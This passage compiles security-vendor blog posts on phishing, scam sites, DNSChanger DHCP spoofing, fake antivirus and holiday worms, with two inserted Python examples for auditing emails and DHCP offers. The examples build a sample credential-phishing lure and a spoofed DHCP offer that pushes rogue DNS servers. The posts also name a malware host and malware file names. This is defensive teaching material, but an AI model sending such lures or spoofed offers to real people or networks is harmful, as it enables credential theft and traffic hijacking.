Almost as bad as clickable links is the practice of instructing a customer to copy and paste a link into their browser. This is another common bad habit that has been exploited by scammers to steal your personal data. Many scammers simply remove the leading www prefix, or the http:// protocol prefix, to keep filters from recognizing the URL in their email. This conditions the customer to assume the link is valid because it’s not clickable, and might also prevent them from visibly confirming the URL.

    Email sent from your company should never provide a URL so complex that it must be copied and pasted. Provide only the main URL to your website, which the customer should be able to identify with. Anything overly complex should be linked to from the website once they get there.
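The two habits above (a clickable link whose displayed text does not match where it really goes, and a bare “paste this into your browser” address outside any link) can be checked mechanically before a mail ever reaches a customer’s inbox. The Python below is an added example, not code from the original post: it extracts every anchor from an HTML mail, compares the href host with the host the visible text claims, and scans the non-link text for paste-me addresses. The institution’s domain examplebank.com, the sample messages, and the 203.0.113.x and .example hosts in them are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical: the single domain the institution tells customers to recognize.
LEGIT_DOMAINS = {"examplebank.com"}

# Something that looks like a URL or bare hostname, with or without scheme/www.
URL_LIKE = re.compile(r"(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?:/[^\s<\"']*)?", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, anchor text) pairs plus the text that sits outside anchors."""

    def __init__(self):
        super().__init__()
        self.links, self.body_text = [], []
        self._href, self._anchor_text = None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._anchor_text = []

    def handle_data(self, data):
        if self._href is None:
            self.body_text.append(data)
        else:
            self._anchor_text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._anchor_text).strip()))
            self._href = None


def host_of(s: str) -> str:
    """Lower-cased hostname of a URL or bare domain ('' if none)."""
    s = s.strip()
    if "://" not in s:          # scheme-less "paste me" addresses
        s = "http://" + s
    return (urlparse(s).hostname or "").lower()


def belongs_to(host: str, legit_domains) -> bool:
    return any(host == d or host.endswith("." + d) for d in legit_domains)


def audit_email_html(html: str, legit_domains=LEGIT_DOMAINS) -> list:
    """Return (kind, detail) findings; an empty list means nothing suspicious."""
    p = LinkCollector()
    p.feed(html)
    findings = []
    for href, text in p.links:
        href_host = host_of(href)
        if not belongs_to(href_host, legit_domains):
            findings.append(("foreign-host", href_host))
        # Displayed text looks like a URL but the href goes somewhere else.
        if URL_LIKE.fullmatch(text):
            text_host = host_of(text)
            if text_host != href_host:
                findings.append(("text-href-mismatch", f"{text_host} -> {href_host}"))
    # "Paste this into your browser" lures: addresses outside any <a>.
    for m in URL_LIKE.finditer(" ".join(p.body_text)):
        host = host_of(m.group(0))
        if not belongs_to(host, legit_domains):
            findings.append(("paste-foreign", host))
    return findings


# Constructed sample (not a real phishing mail): a "verify your account" lure
# with a clickable link, a mismatched displayed URL, and a paste-me address.
SAMPLE_EMAIL = """<p>Dear customer,</p>
<p>Your account has been suspended. Please
<a href="http://203.0.113.9/olb/login.php">Click here</a> to verify your account.</p>
<p>Or visit <a href="http://www.examplebank.com.203.0.113.9.example/login">https://www.examplebank.com/login</a></p>
<p>If the link does not work, paste this into your browser:
examplebank.com.evil-login.example/verify</p>"""

# Constructed sample of the recommended style: plain text, one simple domain.
CLEAN_EMAIL = "<p>To sign in, visit www.examplebank.com and use the sign-on page there.</p>"

if __name__ == "__main__":
    for kind, detail in audit_email_html(SAMPLE_EMAIL):
        print(f"{kind:20} {detail}")
    print("clean:", audit_email_html(CLEAN_EMAIL))
```

The same check applied to outbound mail from the institution is a cheap way to enforce the advice in this section: if a customer notification trips any of these rules, it is teaching the bad habit the scammers rely on.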

     

Multiple Sign-On Domains

    A customer can only know if they’re visiting a legitimate website if the URL in the address bar matches. Many large banks, however, have taken on the poor practice of using multiple domains, and sometimes even using outsourced, third party URLs, to sign customers in. This confuses their customer and conditions them to disregard the URL in the address bar, since they’ll never know if it’s right or not.

    Your company should use a single sign-on page and only one domain name for a customer to identify with. Like the entrance to a concert or other special event, your website should funnel everyone through one central line. This will avoid confusing your customer about which domains you’ve registered; most customers don’t know how to look this information up.

     

    Multiple Sign-On Pages

    In addition to using multiple sign-on domains, many companies use different sign-on pages to log into different types of accounts, or present different pages depending on where the customer is navigating. This desensitizes the user to the look and feel of your website, making them more likely to miss the variations in counterfeit websites, which might have otherwise raised a red flag. 

    The customer should not depend on whether a website “looks” real, however when they are desensitized to the layout and branding of your sign-on page, you increase their likelihood of falling for a scam. It is said that bankers are the best at spotting counterfeit currency because they work with the real thing all day. Your customers can be taught to spot a forgery simply by using one central sign-on page. This page should also have a simple URL that the user can become familiar with. All other pages on your website should link to this one sign-on page.

     

    Log In To Verify Your Account

    Scammers have used various forms of fear mongering for years that have tricked victims into logging in to verify account details. Some of these scams include informing the victim that their account is suspected of fraud, that the account has been suspended, or that they will need to verify their information to avoid an account lock. All of these notifications advise the victim to make an urgent effort to log in.

    When a customer is under duress, they are more likely to skirt their normal common sense checks to address the problem. Companies engaging in this same practice cause their customers to get into the habit of responding to these types of urgent notifications, increasing their chances of falling victim to a bogus one. If a notification is urgent enough to warrant an account lock, it is important enough to be delivered to the customer via telephone, and with proper verification procedures to identify your company to the customer. Sending urgent messages via email is only inviting trouble.

     

    Security Images

    Many websites employ security images to convince the user that they can feel safe logging in so long as they see a teddy bear, a train, or some other image they choose from a library when creating their profile.  As phishing scams become more complex, scammers’ websites can easily start acting as proxies to the legitimate website. This isn’t in widespread use yet, but a few isolated incidents have been seen, and the technique is easy to craft: when you enter your username into the phishing site, the site turns around and queries the legitimate website for your security image. It can then display the security image to the customer to gain their trust.

    Security images and other enhancements are an added layer of security, but your customers should be aware that they can be easily spoofed. Instruct your customers to rely on the website URL, rather than a security image, and to only use the security image as an added means of verification.

     

In addition to these bad habits, many companies avoid addressing the problem entirely, and teach their users that they can protect their account by employing policies such as strong passwords or usernames requiring a digit. Security questions are another common layer added to websites that does little to make them more resilient. None of these techniques will necessarily have any effect in strengthening security against a phishing attack, because the customer is providing the information directly to the scammer’s mockup site. Even revolving security questions can be easily phished when the scammer is familiar with the questions prompted by the institution.

    Identifying legitimate correspondence is the first line of defense a customer has in avoiding a scam. The best thing you can do as a company is to inform your customer that you will never prompt them to click on or paste a link, never instruct them to enter their credit card number online, and familiarize them with the only website URL they should ever associate with your company.

    Unfortunately, many websites still teach bad habits. Large banks continue to use multiple website domains, rather than centralizing all of their sites under a single web address. Other companies have abandoned common sense entirely and send email closely resembling existing phishing scams, complete with hot links and urgent requests. Facebook was recently slammed in the tech community for sending clickable links to their users prompting them to verify information in their account. They’re not alone, however, as many other popular online institutions have been known to follow similar practices.

    In July, we published findings that SPF/DKIM usage was declining among the Fortune-500 companies. Of the 500 wealthiest companies, less than half were implementing the simple, free anti-forgery countermeasures to protect users from spoofed email. You can read more about this at this link.

    Businesses can’t prevent their customers from being scammed, but they can help to educate and condition them to recognize legitimate correspondence. The first step in doing this is to encourage sound practices when visiting your website. By helping your customers avoid becoming victims, you’re helping to avoid headaches that will ultimately become yours, and ensure that your customers remain satisfied ones, likely to return.

    Economic Crisis Creates More Victims

    Following the recent release of this year’s McAfee Virtual Criminology Report, I had the opportunity to talk with diverse European journalists. They asked me for some concrete examples of the malicious Internet “offers” that the economic crisis has produced.

    Fake working-at-home opportunities
    The most visible offers are not new; they are only more numerous. They involve fake recruitment sites proposing working at home, which promises to be well paid and less time consuming than an office job. In fact, these are offers for mule jobs, like the one I described last year.

    No doubt these offers attract all types; but when it becomes hard to find a job, the offer can also appeal to honest people.

    Fake banking services
    Less well known and increasing, fake bank sites flourish over the ‘Net. These are not mirror sites used in phishing attacks; these sites are created solely to attract people searching for a financial institution that can help. When an authentic bank denies a loan, for example, what could be more natural than to search for a more welcoming business.

    The next screen captures offer examples of two live websites among the 20 or so I discovered last week.



    Fake investment firms

    As we watch our investments decline in value, many of us are on the lookout for a high return. Would you welcome an 850 percent profit guaranteed within 24 hours?
     

    These investments are beneficial–at least for the crooks who promote them. With scams like these, it’s not necessary to catch people by the hundreds to make a nice sum of money. But if you invest here, you’ll never again see your tied-up capital.

    Fake legal services
    Cybercriminals know the economic downturn can lead to more people going to court after a dispute with a banker or employer. Watch out for dubious legal offers.
     

    Here, too, the “service” will ask you for a cash advance before starting the job, one which will never be honored.

    In searching for scam sites I have found many other ripoffs, but I hope you are already convinced: Taking advantage of people who are already victims of financial problems is truly scandalous. Yet this is a reminder, as if proof were still necessary, that today’s crooks have no misgivings about abusing the most vulnerable among us.

    McAfee Releases Virtual Criminology Report, Edition 4

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are tailoring their scams to play off the economic recession, and that governments need to collaborate more to face the problem.

    The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific bank going under hits, scams and malware using that messaging emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election: malware themed around President-Elect Barack Obama emerged as early as November 5.

    The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

    It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

    Download your copy of the report here.

    Educate. Advocate. Protect.

    DNSChanger Trojans v4.0

    Earlier today SANS posted an excellent blog on a recent variant of a DNSChanger Trojan. There are some significant implications to this threat, but before I go into those, here’s a brief rundown of the main DNS-changing Trojan tactics used to date:

1. Modify the Windows Hosts file to map specific domain names to specific IP addresses (McAfee classifies these Trojans as QHOSTS Trojans, more of a precursor to DNSChangers)
    2. Modify Windows registry settings to reference specific (rogue) DNS servers [DNSChanger.f]
    3. Create a scheduled task under Mac OS X to reference specific (rogue) DNS servers [OSX/Puper]
    4. Exploit cross-site request forgery vulnerabilities in routers to overwrite the DNS server configuration offered to local area network clients [DNSChanger.f]

    We’ve now seen a new tactic, which has the potential of impacting most devices on the local network–independent of the operating system or device (Windows, Linux, Internet-capable MP3 players,  digital picture frames, refrigerators, you name it). The tactic involves serving the rogue DNS server configuration over DHCP, the protocol responsible for distributing dynamic IP addresses, as well as other information, including DNS settings.

    Here’s a scenario:

    • Jill is using the free WiFi access point at her favorite coffee shop from her infected Windows laptop.
• Steve sits down at the next table and fires up his laptop, which requests an IP address over the wireless local area network.
• Jill’s PC injects a spoofed DHCP Offer that instructs Steve’s computer to route all DNS requests through a rogue DNS server.
    • Steve fires up his web browser and navigates to his favorite social networking site, but while the browser displays the correct URL name, the rogue DNS server has actually directed the browser to another site.

The same applies to any local area network (LAN) where multiple systems connect via DHCP.

    This is significant for several reasons:

    1. The DNSChanger/Puper/Zlob gang has been very successful, infecting millions of PCs during the last couple of years. This gang typically uses strong social engineering to entice victims into installing the malware.
    2. Systems that are not infected with the malware can still have the payload of communicating with the rogue DNS servers delivered to them. This is achieved without exploiting any security vulnerability.
    3. Locating a poisoned system on a sizable network is often a difficult task.
4. Noninfected systems can alternate between using approved DNS settings and rogue settings, depending on whether an infected system is on the LAN and on the random chance that the infected system manages to “poison” the DHCP offer.

    For those interested in the details, this DNSChanger variant drops the legitimate ArcNet NDIS Protocol Driver in the drivers directory:

    • %WinDir%\system32\drivers\ndisprot.sys

    The Trojan uses this driver to inject DHCP Offer packets containing the rogue DNS server IPs.
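Because the rogue settings reach clients through ordinary DHCP traffic, a defender can catch this from the network side without touching the infected host: capture DHCP Offers on the LAN and compare the DNS servers they push (option 6) and the server identifier (option 54) against what the real router should be handing out. The Python below is an added example, not code from this post or from the SANS write-up. It builds two constructed DHCPOFFER packets (the transaction id, the 192.168.1.x addresses and the 203.0.113.x resolvers are made up, and the allowlists are an assumption about the monitored LAN) and parses them the way a capture-fed monitor would.

```python
import ipaddress
import struct

# DHCP/BOOTP constants (RFC 2131 / RFC 2132).
BOOTREPLY = 2
DHCP_MAGIC = b"\x63\x82\x53\x63"
FIXED_HEADER_LEN = 236
OPT_PAD, OPT_END = 0, 255
OPT_DNS_SERVERS, OPT_MSG_TYPE, OPT_SERVER_ID = 6, 53, 54
MSG_OFFER = 2

# Hypothetical allowlist for the LAN being monitored (assumption, not from the post).
TRUSTED_DNS = {"192.168.1.1"}
TRUSTED_DHCP_SERVERS = {"192.168.1.1"}


def build_offer(xid: int, yiaddr: str, server_id: str, dns_servers: list) -> bytes:
    """Construct a minimal DHCPOFFER (BOOTP header + options) for testing."""
    header = struct.pack(
        "!BBBBIHH4s4s4s4s16s64s128s",
        BOOTREPLY, 1, 6, 0,                       # op, htype=Ethernet, hlen, hops
        xid, 0, 0,                                # transaction id, secs, flags
        b"\0" * 4,                                # ciaddr
        ipaddress.IPv4Address(yiaddr).packed,     # yiaddr: address being offered
        ipaddress.IPv4Address(server_id).packed,  # siaddr
        b"\0" * 4,                                # giaddr
        b"\0" * 16, b"\0" * 64, b"\0" * 128,      # chaddr, sname, file
    )
    dns_blob = b"".join(ipaddress.IPv4Address(d).packed for d in dns_servers)
    options = (
        bytes([OPT_MSG_TYPE, 1, MSG_OFFER])
        + bytes([OPT_SERVER_ID, 4]) + ipaddress.IPv4Address(server_id).packed
        + bytes([OPT_DNS_SERVERS, len(dns_blob)]) + dns_blob
        + bytes([OPT_END])
    )
    return header + DHCP_MAGIC + options


def parse_options(packet: bytes) -> dict:
    """Walk the TLV option area after the magic cookie; returns {code: raw bytes}."""
    if len(packet) < FIXED_HEADER_LEN + 4 or packet[FIXED_HEADER_LEN:FIXED_HEADER_LEN + 4] != DHCP_MAGIC:
        raise ValueError("not a DHCP packet (missing magic cookie)")
    opts, i = {}, FIXED_HEADER_LEN + 4
    while i < len(packet):
        code = packet[i]
        if code == OPT_PAD:
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        value = packet[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts


def ipv4_list(blob: bytes) -> list:
    """Decode a run of 4-byte addresses (option 6 may carry several)."""
    return [str(ipaddress.IPv4Address(blob[k:k + 4])) for k in range(0, len(blob) - len(blob) % 4, 4)]


def audit_offer(packet: bytes, trusted_dns=TRUSTED_DNS, trusted_servers=TRUSTED_DHCP_SERVERS) -> list:
    """Return findings for one DHCPOFFER; an empty list means it looks legitimate."""
    if packet[0] != BOOTREPLY:
        return ["not a BOOTREPLY"]
    opts = parse_options(packet)
    if opts.get(OPT_MSG_TYPE, b"\0")[0] != MSG_OFFER:
        return ["not a DHCPOFFER"]
    findings = []
    for s in ipv4_list(opts.get(OPT_SERVER_ID, b"")):
        if s not in trusted_servers:
            findings.append(f"offer from unknown DHCP server {s}")
    for d in ipv4_list(opts.get(OPT_DNS_SERVERS, b"")):
        if d not in trusted_dns:
            findings.append(f"rogue DNS server {d} pushed to client")
    return findings


# Constructed samples: the real router's offer, and a spoofed one that keeps the
# real server identifier but swaps in attacker-controlled resolvers
# (203.0.113.0/24 is the TEST-NET-3 documentation range).
GOOD_OFFER = build_offer(0x3903F326, "192.168.1.50", "192.168.1.1", ["192.168.1.1"])
ROGUE_OFFER = build_offer(0x3903F326, "192.168.1.50", "192.168.1.1", ["203.0.113.7", "203.0.113.8"])

if __name__ == "__main__":
    for name, pkt in (("good", GOOD_OFFER), ("rogue", ROGUE_OFFER)):
        print(name, audit_offer(pkt) or "ok")
```

In practice the packets would come from a capture on the segment (or from a switch’s DHCP-snooping logs); the point of checking the server identifier as well as option 6 is that a spoofed offer from an infected laptop may impersonate the real server, so the DNS allowlist is the check that actually fires.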

Variants using this functionality are not known to be widespread at this point, though even a single infected system could potentially impact hundreds of other systems on the LAN. Though it’s awkward to check, users can examine their DNS settings to see whether they have been affected, and compare the DNS servers listed against the ones their router or ISP should be handing out. For example, type the following at a Windows command prompt:

    ipconfig /all

    For insight into some of what the DNSChanger gang is after, see this post.

    Fake-Alert Tour Driven by Malware Team

Fasten your seatbelts: today we take you on a tour of fake-alert Trojans that have been making the rounds on the Internet lately. On this tour of various malware stations you’ll be taken to a system infected by a fake/rogue anti-virus application. Below is an example of a method such malware uses to infect a machine.

    Here is your itinerary:

    Station 1: Malicious web page that hosts a malware
    Station 2: Browser helper object
    Station 3: Fake/rogue anti-virus application downloader
    Destination: Fake/rogue anti-virus application–infected system

The journey starts with a malicious web page that hosts malware. Users reach these pages through social engineering techniques such as a link sent via email or instant messenger, or a redirect from a compromised legitimate website. A single click on such a link starts the infection.

    Upon visiting the malware-hosting web page, the user “buys a ticket” in the form of an executable file downloaded onto the system through some social engineering technique.

    On our example tour,

    • http://best[blocked]tube.net

    When users visit the page above, they’re asked to download wmcodec_update.exe, which pretends to be a codec plug-in for Windows Media Player. A message box pops up repeatedly until users download the fake plug-in file, which is a Multi Dropper malware.

    Upon execution, the downloaded file pops up a fake error message, as shown below:

    Apps Error

    The malware continues to execute and drops

    1. Browser helper objects
    2. Fake/rogue anti-virus application downloader

    Our “tourists” now move to the next station, the browser helper object. At this station, the victims’ browsers are compromised. For example, a user’s search queries are manipulated to contain a link to another malicious web page. The following two images show the difference between a “clean” search and one made after a link to a malicious web page has been injected by the browser helper object. I have highlighted one malicious site; try to find five differences between the two images. ;-)


    Before injection of the URL:

    clean search results

    A compromised browser–after injection of the malicious URL:

    fake search results

    Many spyware applications use browser helper objects to capture the surfing habits of users. This information is used later by the malware authors for pop-up ads relevant to search keywords, for example.

The next station on our tour is the fake/rogue anti-virus application downloader. Here the user’s desktop shows two “magazines,” which are in fact links to porn sites.

    fake magazine

The fake application is downloaded without user intervention by the “fake” downloader. Finally the user’s system is infected with the fake anti-virus application.

    At this point, users see a bogus alert from the fake application.

    fake warning

    Scanning through the report generated by the fake app reveals that this report is exaggerated and false.

    fake scan report

    The fake-alert malware displays spurious alerts to entice users into buying products to “repair” the system from the fake, exaggerated threat.

    fake activation

    fake subscription

Did you enjoy your fake-alert tour? Today, malware components often work as a team to infect computers. On this tour we saw a malicious web page hosting malware, a Multi Dropper, a browser helper object, a downloader, and a fake alert all working together toward a common goal.

As always, we advise you to be wary of fake plug-in downloads that loop endlessly without giving you a chance to close the message box. Kill the process behind such spurious messages through the Task Manager. Be careful about links in your email, especially in anonymous mail, and links in instant messages. Always practice “safe surfing,” which is the first step in keeping your computers clean.

    Christmas Worm Uses McDonalds, Coca-Cola as Bait

    It’s déjà vu again when Internet scamsters take advantage of the approaching Christmas holidays to entice computer users into opening malicious emails in the guise of holiday promotions or postcards. In the runup to Christmas, every year we see malware authors use varying themes to infect users. And this December is turning out to be no different.

Already in the first week of December, McAfee Avert Labs has observed two active spam campaigns using malware-laced Christmas themes. The first is a spammed e-greeting that links to an IP address hosting an old-school IRC bot SFX package. The animated image in the email is taken from a legitimate site, while the bait IP address [202.82.11.4] belongs to a compromised web server based in Hong Kong.

    The second threat is a new worm christened W32/Xirtem@MM. This worm has a built-in SMTP engine that mass mails copies of itself to email addresses harvested from an infected machine. It uses subjects ranging from Hallmark E-Cards to McDonalds and Coca-Cola Christmas promotions. And to lend authenticity to the email, the images displayed in the spammed email are directly borrowed from the parent websites of Hallmark, McDonalds, and Coca-Cola.

    The worm also has the capabilities of spreading via removable storage devices and peer-to-peer networks. Upon execution, it displays the above picture to trick users into believing that it was a harmless image file.

    The upcoming 5453 DATs to be released today contain detection for the W32/Xirtem@MM worm, while users of McAfee Artemis Technology are already protected in real time against this type of threat :-)

    In the coming weeks, these tactics will tend to evolve rapidly, from crude to sophisticated, as spammers increasingly use Christmas based themes to lure victims. With the level of sophistication seen in today’s threats, the malicious payload could easily be hidden within layers of obfuscation or clever social engineering, and could fool even the savviest of users who try to inspect an email before opening. It is therefore imperative that users are educated on how to avoid becoming a victim. Visit the McAfee Security Advice Center to learn all about online and computer safety tips to help you stay protected.

    Secure Computing Links With McAfee Avert Labs

    Today marks another day of momentous change for McAfee’s research teams.

    I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

    At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

    Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

    We welcome Secure Computing to the McAfee research family.

    Jeff Green
    Senior Vice President
    McAfee Avert Labs

    Where did all the spam go?

    You may have read in the press recently about landfill ISP McColo being de-peered. Spam is just part of this story, though probably the most visual and media-friendly part; please don’t see this ongoing situation as mostly spam related. Spam is simply the most visible tentacle of this octopus.

    Our esteemed blogmaster Ed has been moaning about getting something on the blog about it, and I wanted to dig out something meaningful for our readers, so I contacted a close partner of ours and got some real mailserver stats.

    Cropped Graph

    Quite the haircut I’m sure you’ll agree.

    You can read my previous blog about bots calling home to mother-ships (often via proxies) if you’re interested as to why this had such a sudden and dramatic effect.

    Enjoy the lower load averages while they last though ;)

    This is no reason to rest however, we’re still as busy as ever in the labs and we’re watching as intently as ever. The child porn sites are already on a transatlantic move for instance and we’ll be calling our colleagues at the IWF today for sure.

    Survey style Phish targets JPMorgan Chase & Co.

    Look what we ran across in our spam traps recently:

    Phish email

    $50 for a survey! It’s our unlucky day…

    survey

    As you can see from the partially obscured email address, it is clearly NOT from JP Morgan Chase!! I hope this variation on the theme is suspicious enough to set off most people’s “too-good-to-be-true” radar. We can expect this type of attack to get much more convincing real soon, no doubt.

    2008 Presidential Malware review

    Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both campaigns were hacked during the summer [SecurityFocus blog], I wanted to give you a short overview of the different malware we saw here at McAfee Avert Labs during the US Presidential race.

    Due to the high media attention which Barack Obama received, it seems that the malware authors specifically targeted him instead of John McCain as a means of luring users into clicking on the malware.

    One of the first pieces of malware we saw which exploited the campaign was in August. This was a spammed email which contained a link to get_flash_updates.exe. The email carried the subject “Obama bribes countrymen to win votes”; if the user followed the link, it would download Get_Flash_updates.exe, which was a BackDoor-DNM Trojan.

    The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

    A few weeks later we received a file called Obama_*.exe (I renamed the file due to it containing offensive language) which was detected as PWS-Banker.cs. The file used the Window Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also loaded a video in order to make the user believe that it was in fact a video file.

    Yesterday we received a file named BarackObama.exe which Pedro blogged about [Election day is over]. We also went Low Profile on the Generic PWS.y!6F939359 which was being talked about on several different sites [Washington Post] [Network World].

    Finally, today we also received a new one which was named Beat_Obama_178.exe. This was a simple downloader which attempts to download a file from a Chinese website. This will be detected as Generic Downloader.Z in tomorrow’s DAT release.

    We expect to see several more malicious files using the US Presidential election as a means of social engineering in order to trick users into executing them. So please be on the lookout and keep your security software up to date.

    Three cheers for ICANN!

    … One small step for ICANN …

    I never thought I’d see the day!

    ICANN found its dentures down the back of the sofa and taken a bite out of the criminals’ domain-registration empire. ESTDomains will no longer be a registrar as of Nov 12th. [pdf]

    So I’ve got a question… Who’s got the balls to take on ESTDomains’ problem “customers”?

    “ICANN Seeks Expressions of Interest from Registrars to Receive Bulk Transfer of Names from De-Accredited Registrar EstDomains”

    I recently presented at APWG to encourage the anti-phishing community that registrars and registries can actually act rather than pleading innocence or the classic “our hands are tied” type excuses. In the case of fast-flux they are probably the only ones that can help in fact. I encouraged participants to point out that registrars and registries are guilty of acting illegally in many jurisdictions by facilitating illegal or infectious sites.

    The general stance was that if Directi can clean them out then so can anyone else.

    I pointed out that between 2 registrars (EST and Klik/Vivids) about $1.5M of revenue had taken place with Directi (who gives a healthy proportion of it to Verisign, etc.). I concluded with a slide to motivate participants to “Hug a Registrar” and I implore our readers to help out too. Anyone scoring over 30% on this uribl page is a prime candidate for advocates in the community to reach out and “help”.

    So here is my top 5 for today:

    #1 Moniker – Infested with spammers and pirated software sites. (MSOffice isn’t €79.95 delivered in a zip file)
    #2 XIN NET – This is where the Pill spammers moved to and have given the .cn TLD a bad name.
    #3 35 Tech & OnlineNic – Same as above but with more variety in pill sites and some casinos thrown in too.
    #4 Planet Online – (Surprised to see them so high) Home of the unique-URL “snowshoe” spammers – almost legit? The real world doesn’t care for their bulk and whois-protected domains (via Directi’s LogicBoxes), or fake contacts.
    #5 Dynamic Dolphin – Owned by Scott Richter’s Media Breakaway, formerly the bankrupted OptinRealBig. MS won cases against him in New York in 2005. This accreditation is probably against ICANN’s policy. These days they generally annoy via social networks.
    #Bonus – *.directNIC [Mikko's open letter]

    This is almost 2 years too late and took far too much media attention to shake their tree. The worst of the criminals left EST for other registrars after the “defecation meets the rotary oscillator” in August, but nevertheless, this (so I’m told) is quick for ICANN ;)

    Hip Hip…

    FOCUS’08: A Souvenir of Las Vegas

    Last week, along with 1,200 other attendees from 47 countries, I was in Las Vegas at the FOCUS’08 McAfee Security Conference. In my opinion it was a great success; here are some on-the-spot comments.

    On Tuesday, after the welcome session in which McAfee CEO Dave DeWalt announced, among others, the McAfee Initiative to Fight Cybercrime, I chose to hear my colleagues Toralv Dirro and Pedro Bueno present the state of cybercrime around the globe. In this session, the participants learned the actual methods used by cybercriminals: identity theft, phishing, password-stealing Trojans, virtual money laundering, and botnets. “The cybercrime industry is still booming,” the speakers explained. “It moves about US$100 billion per year and is the most successful sector of organized crime, growing 40 percent per year.”

    Fortunately, the criminals do not win all the time. A supervisory special agent attached to the FBI Cyber Division gave us proof in the next session. Through the example of “Alonzo X,” we learned how the police forces work to catch cybercriminals. Organizing and offering to sell parts of his botnet, consisting of approximately 100,000 infected computers, Alonzo was responsible for sending thousands of spam messages between 2004 and 2007.

    During this track, we learned that, as they do for drug rings, the FBI investigators infiltrate criminal operations. And they are sometimes on the horns of a dilemma: To help the inquiry, do they have the right to use for themselves a botnet they purchase, and can they send themselves spam? We also learned how it was sometimes possible to calculate the fine by considering the expense of a computer repair ($200) and multiplying that amount by the number of infected computers. The police’s role is also to inform the victims that their computers are infected. It is not an easy task when you have a worldwide network of thousands of zombie machines. Someone in the audience asked the agent how much Alonzo earned; the response was approximately $80,000 per year.

    In the third track I attended, participants learned about the views of the U.S. Department of Homeland Security. To introduce his talk, Brett Lambo, the Director of the Cyber Exercise Program, gave us a brief outline of the situation: Today malicious insiders and cybercriminals have both the capabilities and the intent to use the Internet as a playground. Other nations, which also have the capabilities, may have the intent, while terrorist groups may have the intent but do not possess capability. Then, Lambo explained America’s cyberinfrastructure serves as a vital link among 17 critical infrastructure and key resource sectors, as well as providing a fundamental element of all emergency response operations at the federal, state, and local government levels. Since 85 percent of the critical infrastructure in the United States is owned by the private sector, this unity between the cyber response community in the government and private sector will be essential to effective protection and defense.

    On Monday afternoon, I was busy with my own session: “Malware on Second Life–Myth or Reality?” As businesses begin to embrace virtual worlds, there’s more and more money involved. I conducted some research on this platform to demonstrate that Trojans, worms, phishing, and counterfeiting activities were not a myth. Here’s one incident I found: Two teenagers, 15 and 14 years old, have been convicted for virtual theft in the Netherlands. They had stolen a virtual amulet and mask in the multiplayer RuneScape game by forcing another player to transfer the items under the threat of violence. One defendant was sentenced to 200 hours of service, the other to 160 hours. Yes, threats in virtual worlds are a new cause for concern.

    One of the Wednesday events was the talk by colleagues George Kurtz and Brian Kenyon (“Hacking Exposed Live 2008”). The conference room was just large enough to accommodate all the people wishing to see the live demonstration of today’s most advanced attacks and exploits. Perhaps some attendees found this report too technical. For my part, I thank the authors for the 140-page booklet they offered to all the participants.

    Also that day I could not miss the report by Joe Telafici (one of my managers and vice president of operations for McAfee Avert Labs) on the “Economics and Finances of Cybercrime.” After a well-documented threat report that demonstrated the business sense of cybercriminals, Telafici explained that we had to “change the equation” by reducing rewards and making the web harder to use for criminals. “We need a multifunctional, cross-discipline, standards-based approach at fixing the protocols and applications [TCP/IP, DNS, SMTP, HTTP(S)] that make up the Internet,” he concluded.

    I started Thursday by participating in the Craig Schmugar track on “Sō’shəl Ěn’jə-nîr’ĭng.” ;-) Social engineering is one of the most successful tactics attackers can use in committing cybercrime–by enticing a potential victim into performing a distinct action. After some examples, my Avert colleague explained that crimeware defense strategies were rarely discussed in public. First, they concern the trade secrets of the anti-malware industry; and, second, they could help criminals in their bad work if they were circulating. Social engineering defense, however, is a bit different. Schmugar discussed social engineering characteristics (source, destination, circumstance, content type), inspecting metadata (freshness of content, file names, extensions, path, ADS, web domain and site names), considering static binary properties (container, file size, icon, use of “obscure” functionality and digital signatures) and considering the environment (service names and description, registry references).

